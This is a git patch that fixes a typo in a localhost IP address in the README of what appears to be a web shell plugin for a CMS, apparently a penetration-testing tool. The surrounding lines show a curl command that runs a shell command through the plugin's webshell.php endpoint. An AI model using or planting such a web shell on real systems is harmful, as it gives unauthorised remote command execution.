From 88812b78cc6a0db819fa4b6ceb4c5e870a95384f Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sat, 21 May 2022 11:45:56 +0200 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 20342e3..de92909 100644 --- a/README.md +++ b/README.md @@ -27,7 +27,7 @@ Go to "Configuration --> plugins" page, at http://localhost:10080/index.php/admi ### Step 2.1: Executing commands -You can now execute commands by sending a GET or POST request to http://127.0.01/upload/plugins/WebShell/webshell.php with `action=exec&cmd=id`: +You can now execute commands by sending a GET or POST request to http://127.0.0.1/upload/plugins/WebShell/webshell.php with `action=exec&cmd=id`: ```sh $ curl -X POST 'http://localhost:10080/upload/plugins/WebShell/webshell.php' --data "action=exec&cmd=id"